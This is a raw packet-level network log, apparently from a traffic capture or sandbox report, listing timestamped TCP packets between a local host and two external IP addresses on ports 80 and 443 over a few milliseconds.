Aug 10, 2024 16:12:24.300175905 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300445080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300506115 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300513029 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300679922 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300745964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300779104 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300795078 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300798893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300812960 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300837040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300880909 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300884008 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300955057 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.301374912 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.301419020 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.301454067 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.301460028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.301469088 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302525043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302536011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302613020 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302617073 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302628040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302669048 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302721977 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302783012 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302791119 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302907944 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302927017 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.302930117 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.302959919 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.303340912 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.303462029 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.303529024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.303534031 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.305314064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305330038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305352926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305367947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305371046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305375099 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.305382967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305396080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305408001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305422068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305423975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305437088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305437088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305452108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305460930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305466890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305475950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305481911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305489063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305496931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305510044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305519104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305538893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305542946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305567026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305581093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305593014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305613995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305618048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305633068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305648088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305650949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305665970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305674076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305674076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305680037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305680990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305696011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305704117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305711031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305722952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305727005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305731058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305752039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305893898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305917025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305932045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305938959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305946112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305958033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305960894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305963993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305975914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305990934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.305994034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.305994034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306009054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306035042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306619883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306639910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306653976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306670904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306687117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306696892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306701899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306710958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306716919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306735039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306735992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306759119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306766987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306766987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306773901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306787014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306793928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306801081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306821108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306824923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306838989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306863070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306895971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306910992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306911945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306926966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306941986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306950092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306967974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306976080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.306983948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.306999922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307015896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307027102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307034969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307045937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307050943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307058096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307075024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307094097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307902098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307917118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307931900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.307959080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.307981014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308013916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308037996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308052063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308064938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308079958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308095932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308099985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308118105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308120012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308132887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308144093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308151007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308156967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308171034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308175087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308186054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308209896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308209896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308224916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308233023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308237076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308252096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308254957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308267117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308269024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308281898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308298111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308314085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308330059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308330059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308330059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308330059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308804035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308816910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308829069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308845997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308855057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308860064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308871984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308875084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308896065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308921099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308922052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308937073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308950901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308974981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308976889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.308989048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.308990002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309004068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309014082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309020042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309040070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309043884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309060097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309062004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309072971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309084892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309087992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309097052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309103012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309113026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309118986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309130907 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309140921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309142113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309155941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309158087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309175014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309180021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309184074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309195995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309211016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309226036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309240103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309253931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309254885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309268951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309282064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309284925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309293032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309302092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309314966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309319019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309329033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309333086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309353113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309354067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309367895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309381008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309382915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309392929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309397936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309411049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309415102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309422016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309437990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309453011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309501886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309582949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309608936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309624910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309730053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309747934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309762955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309778929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309792042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309808016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.309829950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309829950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.309859037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310163021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310185909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310201883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310216904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310230970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310233116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310245991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310252905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310261011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310275078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310460091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310475111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310489893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310503960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310513020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310513020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310513020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310513020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310527086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310550928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310565948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310578108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310591936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310607910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310610056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310610056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310610056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310610056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310631037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310638905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310811996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310903072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310916901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310931921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310946941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310962915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310987949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.310997963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310997963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310997963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.310997963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311002970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311017990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311033010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311047077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311073065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311084986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311098099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311109066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311109066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311109066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311109066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311111927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311126947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311141014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311155081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311171055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311182022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311182022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311182022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311182022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311196089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311220884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311234951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311255932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311265945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311265945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311270952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311285973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311291933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311301947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311316013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311330080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311343908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311357975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311372042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311373949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311373949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311373949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311373949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311386108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311407089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311407089 CEST	49740	80	192.168.2.4	147.45.44.104
